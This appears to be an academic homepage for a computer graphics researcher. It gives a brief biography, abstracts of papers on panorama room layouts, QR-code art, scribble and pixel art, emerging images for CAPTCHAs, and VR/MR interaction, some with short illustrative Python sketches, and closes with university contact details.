Hung-Kuo received his B.S. degree in Computer Science and Information Engineering (CSIE) from National Cheng-Kung University (NCKU), Taiwan, in 2003. He began pursuing a Ph.D. degree in 2004 and completed it in 2010. During his Ph.D. studies, Hung-Kuo visited the Hong Kong University of Science and Technology (HKUST) in 2007 and the Chinese University of Hong Kong (CUHK) in 2009, under the guidance of Chiew-Lan Tai and Tien-Tsin Wong, respectively. Hung-Kuo also visited the Indian Institute of Technology (IIT) in 2008 and King Abdullah University of Science and Technology (KAUST) in 2009 for two collaborative research projects, both under the supervision of Niloy J. Mitra.
After graduation, Hung-Kuo joined the Yahoo! Inc. Research Lab as a summer visiting intern under the supervision of Belle Tseng and Shyam Mittur.
Hung-Kuo's major research interest is Computer Graphics, including specific topics such as Shape Analysis, Smart Manipulation, Video/Image Processing, Human-Computer Interaction, and Visual Perception.
Recent approaches for predicting layouts from 360° panoramas produce excellent results. These approaches build on a common framework consisting of three steps: a pre-processing step based on edge-based alignment, prediction of layout elements, and a post-processing step that fits a 3D layout to the predicted elements. Until now, it has been difficult to compare the methods due to multiple different design decisions, such as the encoding network (e.g., SegNet or ResNet), the type of elements predicted (e.g., corners, wall/floor boundaries, or semantic segmentation), or the method of fitting the 3D layout. To address this challenge, we summarize and describe the common framework, the variants, and the impact of the design decisions. For a complete evaluation, we also propose extended annotations for the Matterport3D dataset, and introduce two depth-based evaluation metrics.
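As a rough illustration, the shared structure reduces to three calls; the sketch below (Python) uses hypothetical stub names, since each surveyed method supplies its own implementation of the stages:

import numpy as np

# Hypothetical stubs: each surveyed method supplies its own version of
# these three stages; the names below are placeholders, not a real API.
def align_to_manhattan_axes(pano):      # pre-processing: edge-based alignment
    raise NotImplementedError
def predict_layout_elements(pano):      # encoder network (e.g., SegNet/ResNet)
    raise NotImplementedError
def fit_3d_layout(elements):            # post-processing: fit a 3D layout
    raise NotImplementedError

def estimate_layout(panorama: np.ndarray):
    """The common three-step framework shared by the surveyed methods."""
    aligned = align_to_manhattan_axes(panorama)    # 1. align to Manhattan axes
    elements = predict_layout_elements(aligned)    # 2. corners / boundaries /
                                                   #    semantic segmentation
    return fit_3d_layout(elements)                 # 3. fit a 3D room layout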
Research has shown that turn-by-turn navigation guidance makes users overly reliant on it, impairing their independent wayfinding ability. This paper compares the impacts of two new types of navigation guidance (reference-based and orientation-based) on users' ability to independently navigate to the same destinations, both relative to each other and relative to two types of traditional turn-by-turn guidance, i.e., map-based and augmented-reality (AR)-based. The results of our within-subjects experiment indicate that, while reference-based guidance led users to take more time to navigate when first receiving it, it boosted their subsequent ability to independently navigate to the same destination in less time, via more efficient routes, and with less assistance-seeking from their phones than either map-based or AR-based turn-by-turn guidance did.
This paper presents a novel algorithm to generate micrography QR codes, a new machine-readable graphic created by embedding a QR code within a micrography image. The unique structure of micrography makes it incompatible with existing methods used to combine QR codes with natural or halftone images. We exploit the high-frequency nature of micrography in the design of a novel deformation model that enables the skillful warping of individual letters and the adjustment of font weights to embed a QR code within a micrography image. The entire process is supervised by a set of visual quality metrics tailored specifically for micrography, in conjunction with a novel QR code quality measure aimed at striking a balance between visual fidelity and decoding robustness. The proposed QR code quality measure is based on probabilistic models learned from decoding experiments that use popular decoders with synthetic QR codes to capture the various forms of distortion that result from image embedding. Experimental results demonstrate the efficacy of the proposed method in generating micrography QR codes of high quality from a wide variety of inputs. The ability to embed QR codes at multiple scales makes it possible to produce a wide range of diverse designs. Experiments and user studies were conducted to evaluate the proposed method from both qualitative and quantitative perspectives.
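To make the decoding-robustness side concrete, the sketch below estimates how reliably each QR module would binarize in a rendered result. It is a minimal stand-in, assuming a grayscale render in [0, 1] and a known module grid; the paper's actual measure is a learned, decoder-specific probabilistic model:

import numpy as np

def module_reliability(image: np.ndarray, modules: np.ndarray) -> np.ndarray:
    """Estimate how reliably each QR module would binarize.

    image:   grayscale render of the micrography QR code, values in [0, 1].
    modules: target bit per module (1 = black, 0 = white), shape (n, n).
    This mean-luminance check is only a stand-in for the learned,
    decoder-specific probabilistic measure described in the paper.
    """
    n = modules.shape[0]
    h, w = image.shape
    cell_h, cell_w = h // n, w // n
    reliability = np.zeros_like(modules, dtype=float)
    for i in range(n):
        for j in range(n):
            cell = image[i*cell_h:(i+1)*cell_h, j*cell_w:(j+1)*cell_w]
            mean = cell.mean()
            # Signed distance of the cell's mean luminance from the 0.5
            # binarization threshold, toward the intended bit.
            reliability[i, j] = (0.5 - mean) if modules[i, j] else (mean - 0.5)
    return reliability  # negative entries mark modules likely to misdecode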
Color scribbling is a unique form of illustration in which artists use compact, overlapping, monochromatic scribbles at the microscopic scale to create astonishing colorful images at the macroscopic scale. The creation process is skill-demanding and time-consuming, typically involving delicately drawing monochromatic scribbles layer by layer to depict true-color subjects using a limited color palette. In this work, we present a novel computational framework for the automatic generation of color scribble images from arbitrary raster images. The core contribution of our work lies in a novel color dithering model tailor-made for synthesizing a smooth color appearance using multiple layers of overlapping monochromatic strokes. Specifically, our system reconstructs the appearance of the input image by (i) generating layers of monochromatic scribbles based on a limited color palette derived from the input image, and (ii) optimizing the drawing sequence among layers to minimize both the visual color dissimilarity between the dithered image and the original image and the color banding artifacts. We demonstrate the effectiveness and robustness of our algorithm with various convincing results synthesized from a variety of input images with different stroke patterns. The experimental study further shows that our approach faithfully captures the scribble style and the color presentation at the microscopic and macroscopic scales, respectively, which is otherwise difficult for state-of-the-art methods.
We present a deep learning framework, called DuLa-Net, to predict Manhattan-world 3D room layouts from a single RGB panorama. To achieve better prediction accuracy, our method leverages two projections of the panorama at once, namely the equirectangular panorama-view and the perspective ceiling-view, each of which contains different clues about the room layout. Our network architecture consists of two encoder-decoder branches, one for each of the two views. In addition, a novel feature fusion structure is proposed to connect the two branches, which are then jointly trained to predict the 2D floor plans and layout heights. To learn more complex room layouts, we introduce the Realtor360 dataset, which contains panoramas of Manhattan-world room layouts with different numbers of corners. Experimental results show that our work outperforms recent state-of-the-art methods in prediction accuracy and performance, especially for rooms with non-cuboid layouts.
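A minimal sketch of the equirectangular-to-ceiling-view resampling that such a two-branch design relies on is shown below; the field of view, axis conventions, and nearest-neighbor sampling are assumptions for illustration, not DuLa-Net's exact settings:

import numpy as np

def ceiling_view(pano: np.ndarray, out_size: int = 512, fov_deg: float = 160.0):
    """Resample an equirectangular panorama (H x W x 3) into a perspective
    view looking straight up at the ceiling (a sketch of the projection;
    the paper's exact convention may differ)."""
    h, w, _ = pano.shape
    f = np.tan(np.radians(fov_deg) / 2.0)
    # Pixel grid of the output view in normalized coordinates [-1, 1].
    v, u = np.meshgrid(np.linspace(-1, 1, out_size),
                       np.linspace(-1, 1, out_size), indexing="ij")
    # Ray directions: z is up; the virtual camera looks toward +z.
    x, y, z = u * f, v * f, np.ones_like(u)
    norm = np.sqrt(x**2 + y**2 + z**2)
    x, y, z = x / norm, y / norm, z / norm
    lon = np.arctan2(x, y)               # longitude in (-pi, pi]
    lat = np.arcsin(z)                   # latitude; positive for up-rays
    # Map spherical coordinates to equirectangular pixel indices.
    col = ((lon / (2 * np.pi) + 0.5) * (w - 1)).astype(int)
    row = ((0.5 - lat / np.pi) * (h - 1)).astype(int)
    return pano[row, col]                # nearest-neighbor sampling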
Interacting with digital content in 3D is an essential component of various applications (e.g., modeling packages, gaming, virtual reality, etc.). Traditional interfaces such as keyboard-mouse or trackball usually demand non-trivial working space as well as a learning process. We present the design of EZ-Manipulator, a new 3D manipulation interface on smartphones that supports mobile, fast, and ambiguity-free interactions with 3D objects. Our system leverages the built-in multitouch input and gyroscope sensor of a smartphone to achieve 9DOF (nine degrees of freedom) axis-constrained manipulations and free-form rotation. Thus, using EZ-Manipulator to manipulate objects in 3D is easy: the user merely has to perform intuitive single- or two-finger gestures, or rotate the device in hand, to achieve manipulations at fine-grained and coarse levels, respectively. We further investigate the ambiguity introduced by indirect manipulation through the multitouch interface and propose a dynamic virtual camera adjustment to effectively resolve it. A preliminary study reports that our system yields significantly lower task completion times than the conventional keyboard-mouse interface, and receives positive user experiences from both novices and experts.
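Purely as a hypothetical illustration of how such input might dispatch to the 9 DOF (axis-constrained translation, rotation, and scaling) plus free-form rotation, consider the sketch below; the gesture names and the mapping are invented for illustration and are not the paper's actual design:

from dataclasses import dataclass

@dataclass
class Transform:
    translate: tuple = (0.0, 0.0, 0.0)
    rotate:    tuple = (0.0, 0.0, 0.0)   # Euler angles, radians
    scale:     tuple = (1.0, 1.0, 1.0)

def map_input(gesture: str, axis: int, delta: float, gyro=None) -> Transform:
    """Hypothetical dispatch of EZ-Manipulator-style input to the 9
    axis-constrained DOF, plus free-form rotation from the gyroscope."""
    t = Transform()
    if gyro is not None:                   # coarse: rotate the device in hand
        t.rotate = gyro                    # free-form rotation
    elif gesture == "one_finger_drag":     # fine: axis-constrained translate
        v = [0.0, 0.0, 0.0]; v[axis] = delta
        t.translate = tuple(v)
    elif gesture == "two_finger_drag":     # fine: axis-constrained rotate
        r = [0.0, 0.0, 0.0]; r[axis] = delta
        t.rotate = tuple(r)
    elif gesture == "two_finger_pinch":    # fine: axis-constrained scale
        s = [1.0, 1.0, 1.0]; s[axis] = 1.0 + delta
        t.scale = tuple(s)
    return t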
Flat design is a modern style of graphic design that minimizes the number of design attributes required to convey 3D shapes. This approach suits design contexts requiring simplicity and efficiency, such as mobile computing devices. This 'less-is-more' design inspiration poses significant challenges in practice, since it selects from a restricted range of design elements (e.g., color and resolution) to represent complex shapes. In this work, we investigate a means of computationally generating a specialized 2D flat representation (an image formed by black-and-white patches) from 3D shapes. We present a novel framework that automatically abstracts 3D man-made shapes into 2D binary images at multiple scales. Based on a set of identified design principles related to the inference of geometry and structure, our framework jointly analyzes the input 3D shape and its counterpart 2D representation, followed by executing a carefully devised layout optimization algorithm. The robustness and effectiveness of our method are demonstrated by testing it on a wide variety of man-made shapes and comparing the results with baseline methods via a pilot user study. We further present two practical applications that are likely to benefit from our work.
Mixed reality (MR) has changed the way we see and interact with our world. While current-generation MR head-mounted devices (HMDs) are capable of generating high-quality visual content, interaction in most MR applications typically relies on in-air hand gestures, gaze, or voice. Although these interfaces are intuitive to learn, they may easily lead to inaccurate operations due to fatigue or environmental constraints. In this work, we present Dual-MR, a novel MR interaction system that i) synchronizes the MR viewpoints of the HMD and a handheld smartphone, and ii) enables precise, tactile, immersive, and user-friendly object-level manipulations through the multitouch input of the smartphone. In addition, Dual-MR allows multiple users to join the same MR coordinate system to facilitate collaboration in the same physical space, which further broadens its usability. A preliminary user study shows that our system clearly outperforms the conventional interface combining in-air hand gestures and gaze in terms of completion time for a series of 3D object manipulation tasks in MR.
While the content of virtual reality (VR) has grown explosively in recent years, the design of user-friendly control interfaces in VR has advanced at a slow pace. The most commonly used devices, such as gamepads or controllers, have a fixed shape and weight, and thus cannot provide realistic haptic feedback when interacting with virtual objects in VR. In this work, we present a novel and lightweight tracking system in the context of manipulating handheld objects in VR. Specifically, our system can effortlessly synchronize the 3D pose of arbitrary handheld objects between the real world and VR in real time. The tracking algorithm is simple, delicately leveraging the power of a Leap Motion and an IMU sensor to track the object's location and orientation, respectively. We demonstrate the effectiveness of our system with three VR applications that use a pencil, a ping-pong paddle, and a smartphone as control interfaces to provide users a more immersive VR experience.
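The division of labor described above (location from the Leap Motion, orientation from the IMU) composes into a single object pose roughly as sketched below; the quaternion convention and the grip offset are assumptions:

import numpy as np

def fuse_pose(leap_position, imu_quaternion, grip_offset=(0.0, 0.0, 0.0)):
    """Compose a 4x4 object pose from the two sensors: the Leap Motion
    supplies the 3D location and the IMU supplies the orientation as a
    unit quaternion (w, x, y, z). Conventions here are assumptions."""
    w, x, y, z = imu_quaternion
    # Standard quaternion-to-rotation-matrix conversion.
    R = np.array([
        [1 - 2*(y*y + z*z),     2*(x*y - w*z),     2*(x*z + w*y)],
        [    2*(x*y + w*z), 1 - 2*(x*x + z*z),     2*(y*z - w*x)],
        [    2*(x*z - w*y),     2*(y*z + w*x), 1 - 2*(x*x + y*y)],
    ])
    T = np.eye(4)
    T[:3, :3] = R
    # Tracked hand position plus a fixed grip offset rotated into the
    # object's current orientation (hypothetical calibration term).
    T[:3, 3] = np.asarray(leap_position, float) + R @ np.asarray(grip_offset, float)
    return T  # object-to-world transform for the VR renderer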
A large dataset of outdoor panoramas with ground-truth labels of sun position (SP) can provide valuable training data for learning outdoor illumination. In general, the sun position (if visible) in an outdoor panorama corresponds to the pixel with the highest luminance and contrast with respect to neighboring pixels. However, neither image-based estimation nor manual annotation can obtain a reliable SP due to the complex interplay between sunlight and sky appearance. Here, we present an efficient and reliable approach to estimate the SP of an outdoor panorama with accessible metadata. Specifically, we focus on outdoor panoramas retrieved from Google Street View and leverage the built-in metadata as well as a well-established Solar Position Algorithm to propose a set of candidate SPs. Next, a custom-made luminance model is used to rank each candidate, and a confidence metric is computed to effectively filter out trivial cases (e.g., cloudy days or an occluded sun). We extensively evaluated the efficacy of our approach by conducting an experimental study on a dataset of over 600 panoramas.
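A minimal sketch of the projection step implied above: given the sun's azimuth and elevation from a Solar Position Algorithm and the panorama's compass heading from the metadata, locate the candidate SP pixel in the equirectangular image. The coordinate conventions here are assumptions:

def sun_pixel(azimuth_deg, elevation_deg, heading_deg, width, height):
    """Project a solar (azimuth, elevation) onto an equirectangular panorama.

    azimuth_deg:   sun azimuth from a Solar Position Algorithm (deg, from north)
    elevation_deg: sun elevation above the horizon (deg)
    heading_deg:   compass heading of the panorama center (from metadata)
    Returns (col, row), or None if the sun is below the horizon.
    The north-referenced azimuth and center-aligned heading are assumptions.
    """
    if elevation_deg <= 0:
        return None  # sun below the horizon: no visible SP
    # Horizontal offset of the sun from the panorama center, wrapped to
    # [-180, 180) degrees, then mapped to [0, 1).
    rel = ((azimuth_deg - heading_deg + 180.0) % 360.0) - 180.0
    u = rel / 360.0 + 0.5
    # Vertical: elevation 90 deg -> top row; 0 deg -> horizon at mid-height.
    v = 0.5 - elevation_deg / 180.0
    return int(u * (width - 1)), int(v * (height - 1))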
We present PanoAnnotator, a semi-automatic system that facilitates the annotation of 2D indoor panoramas to obtain high-quality 3D room layouts. Observing that fully-automatic methods are often restricted to a subset of indoor panoramas and generate room layouts of mediocre quality, we instead propose a hybrid method that recovers high-quality room layouts by leveraging both automatic estimation and user edits. Specifically, our system first employs state-of-the-art methods to automatically extract 2D/3D features from the input panorama, based on which an initial Manhattan-world layout is estimated. The user can then further edit the layout structure via a set of intuitive operations, while the system automatically refines the geometry according to the extracted features. The experimental results show that our automatic initialization outperforms a selected fully-automatic state-of-the-art method, producing room layouts with higher accuracy. In addition, our complete system reduces annotation time compared with a fully-manual tool achieving the same high-quality results.
Line drawing is a style of image abstraction in which the perception of an image is conveyed using distinct straight or curved lines. However, extracting semantically salient lines is not trivial and is mastered only by skilled artists. While many parametric filters can successfully extract accurate and coherent lines, their results are sensitive to parameter tuning and easily lead to either an excessive or an insufficient number of lines. In this work, we present an interactive system to generate concise line abstractions of arbitrary images via a few user-specified strokes. Specifically, the user simply provides a few intuitive strokes on the input image, tracing roughly along edges and scribbling on regions of interest, through a sketching interface. The system then automatically extracts lines that are long, coherent, and share similar textural structures from a corresponding highly detailed line drawing image. We have tested our system on a wide variety of images. The experimental results show that our system outperforms state-of-the-art techniques in terms of quality and efficiency.
Video remains the method of choice for capturing temporal events. However, without access to the underlying 3D scene models, it remains difficult to make object-level edits in a single video or across multiple videos. While it may be possible to explicitly reconstruct the 3D geometry to facilitate these edits, such a workflow is cumbersome, expensive, and tedious. In this work, we present a much simpler workflow for creating plausible edits and mixes of raw video footage using only sparse structure points (SSP) directly recovered from the raw sequences. First, we utilize user scribbles to structure the point representations obtained by running structure-from-motion on the input videos. The resultant structure points, even when noisy and sparse, are then used to enable various video edits in 3D, including view perturbation, keyframe animation, object duplication, transfer across videos, etc. Specifically, we describe how to synthesize object images from new views using a novel image-based rendering technique that uses the SSPs as a proxy for the missing 3D scene information. We propose a structure-preserving image warping on multiple input frames adaptively selected from the object video, followed by a spatio-temporally coherent image stitching to compose the final object image. Simple planar shadows and depth maps are synthesized for objects to generate plausible video sequences mimicking real-world interactions. We demonstrate our system on a variety of input videos to produce complex edits which are otherwise difficult to achieve.
Emergence is the visual phenomenon by which humans recognize the objects in a seemingly noisy image by aggregating information from meaningless pieces and perceiving a whole that is meaningful. Such a unique mental skill renders emergence an effective scheme to tell humans and machines apart. Images that are detectable by humans but difficult for an automatic algorithm to recognize are also referred to as emerging images. A recent state-of-the-art work proposes to synthesize such images from 3D objects, and its results have been verified to be easy for humans to recognize while posing a hard time for automatic machines. However, using 3D objects as inputs brings drawbacks that prevent the system from being practical and scalable for generating an unlimited number of high-quality images: the quality of results is sensitive to the viewing and lighting conditions in the 3D domain, and the available resources of 3D models are usually limited, which restricts scalability. This paper presents a novel synthesis technique to automatically generate emerging images from regular photographs, which are commonly taken with decent settings and widely accessible online. We adapt the previous system to the 2D setting of input photographs and develop a set of image-based operations. Our algorithm also supports controlling the difficulty level of the resultant images through a limited set of parameters. We conducted several experiments to validate the efficacy and efficiency of our system.
Pixel art is a modern digital art form in which high-resolution images are abstracted into low-resolution pixelated outputs using concise outlines and reduced color palettes. Creating pixel art is a labor-intensive and skill-demanding process due to the challenge of using limited pixels to represent complicated shapes. Not surprisingly, generating pixel art animation is even harder, given the additional constraints imposed in the temporal domain. Although many powerful editors have been designed to facilitate the creation of still pixel art images, the extension to pixel art animation remains an unexplored direction. Existing systems typically require users to craft individual pixels frame by frame, which is a tedious and error-prone process. In this work, we present a novel animation framework tailored to pixel art images. Our system builds on a conventional key-frame animation framework and state-of-the-art image warping techniques to generate an initial animation sequence. The system then jointly optimizes the prominent feature lines of individual frames with respect to three metrics that capture the quality of the animation sequence in both the spatial and temporal domains. We demonstrate our system by generating visually pleasing animations from a variety of pixel art images, which would otherwise be difficult to achieve with state-of-the-art techniques due to severe artifacts.
Circular scribble art is a kind of line drawing in which seemingly random, noisy, and shapeless circular scribbles at the microscopic scale constitute astonishing grayscale images at the macroscopic scale. Such a delicate skill renders the creation of circular scribble art a tedious and time-consuming task, even for gifted artists. In this work, we present a novel method for the automatic synthesis of circular scribble art. The synthesis problem is modeled as tracing along a virtual path with a parametric circular curve. To reproduce the tone and important edge structure of the input grayscale image, the system adaptively adjusts the density and structure of the virtual path, and dynamically controls the size, drawing speed, and orientation of the parametric circular curve during synthesis. We demonstrate the potential of our system using several circular scribble images synthesized from a wide variety of grayscale images. A preliminary experimental study was conducted to qualitatively and quantitatively evaluate our method. The results show that our method is efficient and generates convincing results comparable to artists' artworks.
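A minimal sketch of the tracing idea, assuming a polyline virtual path and a tone-driven radius and winding speed; the paper's actual path construction, orientation control, and edge handling are more elaborate:

import numpy as np

def scribble_along_path(path, tone, base_radius=6.0, step=0.35):
    """Trace a parametric circular curve along a virtual path.

    path: (n, 2) array of points defining the virtual path.
    tone: callable (x, y) -> target darkness in [0, 1] at that location.
    Returns a polyline of pen positions; darker tones shrink the loop
    radius and speed up the winding so loops overlap more densely (an
    assumption standing in for the paper's density and speed control).
    """
    pts, t = [], 0.0
    for i in range(len(path) - 1):
        p, q = np.asarray(path[i], float), np.asarray(path[i + 1], float)
        seg_len = np.linalg.norm(q - p)
        steps = max(int(seg_len / 0.5), 1)      # advance center ~0.5 px/step
        for s in range(steps):
            c = p + (q - p) * (s / steps)       # current center on the path
            d = float(tone(*c))                 # local target darkness
            r = base_radius * (1.0 - 0.7 * d)   # darker -> tighter loops
            t += step * (0.5 + d)               # darker -> faster winding
            pts.append(c + r * np.array([np.cos(t), np.sin(t)]))
    return np.array(pts)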
LEGO, a popular brick-based toy construction system, provides an affordable and convenient way of fabricating geometric shapes. However, building arbitrary shapes using LEGO bricks with restricted colors and sizes is not trivial; it requires a careful design process to produce appealing, stable, and constructable brick sculptures. In this work, we investigate the novel problem of constructing brick sculptures from pixel art images. In contrast to previous efforts that focus on 3D models, pixel art contains rich visual content for generating engaging LEGO designs. On the other hand, the characteristics of pixel art and the corresponding brick sculptures pose new challenges to the design process. We propose a novel computational framework to automatically construct brick sculptures from pixel art, based on a set of design guidelines concerning the visual quality as well as the structural stability of the built sculptures. We demonstrate the effectiveness of our framework with various brick sculptures (both real and virtual) generated from a variety of pixel art images. Experimental results show that our system is efficient and achieves significant improvements over the state of the art.
In this work, we propose an automatic algorithm to synthesize emerging images from regular photographs. To generate images that remain easy for humans to perceive, the previous approach renders complex splats that capture the silhouette and shading information of 3D objects. We observe that comparable information can be retrieved from photographs as well, and we therefore replace the rendering of black complex splats with superpixels. The previous approach further applies two post-processing steps to make segmentation harder for bots, and both of them have counterpart operations in the image domain. Supported by public image databases such as Flickr and Picasa, we envision a potential CAPTCHA application of our approach that massively and efficiently generates emerging images from photographs.
Camouflage images contain one or more hidden figures that remain imperceptible or unnoticed for a while. In one possible explanation, the ability to delay the perception of the hidden figures is attributed to the theory that human perception works in two main phases: feature search and conjunction search. Effective camouflage images make feature-based recognition difficult, and thus force the recognition process to employ conjunction search, which takes considerable effort and time. In this paper, we present a technique for creating camouflage images. To foil the feature search, we remove the original subtle texture details of the hidden figures and replace them with those of the surrounding apparent image. To leave an appropriate degree of clues for the conjunction search, we compute and assign new tones to regions in the embedded figures by performing an optimization between two conflicting terms, which we call immersion and standout, corresponding to hiding and leaving clues, respectively. We show a large number of camouflage images generated by our technique, with or without user guidance. We have tested the quality of the images in an extensive user study, showing good control of the difficulty levels.
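Schematically, the trade-off between the two terms can be written as a weighted objective over the assigned tones T; the form below is an illustrative sketch rather than the paper's exact formulation:

    E(T) = \lambda_{im} E_{immersion}(T) + \lambda_{so} E_{standout}(T)

Minimizing E(T) balances how well the hidden figure blends into the surrounding image (immersion) against how much tonal evidence remains for conjunction search (standout); the relative weights then offer a natural handle on the difficulty level.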
Emergence refers to the unique human ability to aggregate information from seemingly meaningless pieces, and to perceive a whole that is meaningful. This special skill of humans can constitute an effective scheme to tell humans and machines apart. This paper presents a synthesis technique to generate images of 3D objects that are detectable by humans, but difficult for an automatic algorithm to recognize. The technique allows generating an infinite number of images with emerging figures. Our algorithm is designed so that locally the synthesized images divulge little useful information or cues to assist any segmentation or recognition procedure. Therefore, as we demonstrate, computer vision algorithms are incapable of effectively processing such images. However, when a human observer is presented with an emergence image, synthesized using an object she is familiar with, the figure emerges when observed as a whole. We can control the difficulty level of perceiving the emergence effect through a limited set of parameters. A procedure that synthesizes emergence images can be an effective tool for exploring and understanding the factors affecting computer vision techniques.
Extraction of curve-skeletons is a fundamental problem with many applications in computer graphics and visualization. In this paper, we present a simple and robust skeleton extraction method based on mesh contraction. The method works directly on the mesh domain, without pre-sampling the mesh model into a volumetric representation. The method first contracts the mesh geometry into a zero-volume skeletal shape by applying implicit Laplacian smoothing with global positional constraints. The contraction does not alter the mesh connectivity and retains the key features of the original mesh. The contracted mesh is then converted into a 1D curve-skeleton through a connectivity surgery process to remove all the collapsed faces while preserving the shape of the contracted mesh and the original topology. The centeredness of the skeleton is refined by exploiting the induced skeleton-mesh mapping. The contraction process generates valuable information about the object's geometry, in particular, the skeleton-vertex correspondence and the local thickness, which are useful for various applications. We demonstrate its effectiveness in mesh segmentation and skinning animation.
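The contraction step admits a compact statement as an iterated linear least-squares solve; the following is the standard mesh-contraction formulation, written here as a sketch:

    \begin{bmatrix} W_L L \\ W_H \end{bmatrix} V' =
    \begin{bmatrix} 0 \\ W_H V \end{bmatrix}

where L is the (cotangent) Laplacian of the current mesh, V and V' are the vertex positions before and after one iteration, and the diagonal weight matrices W_L and W_H balance the contraction force against the positional constraints. Each iteration solves this over-determined system in the least-squares sense and then increases W_L (and updates W_H) so the geometry keeps collapsing toward a zero-volume skeletal shape.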
Email: hkchu(AT)cs.nthu.edu.tw
Phone: +886-3-5731215
Department of Computer Science
National Tsing Hua University
No. 101, Section 2, Kuang-Fu Road, Hsinchu, Taiwan 30013
Room 641, Delta Building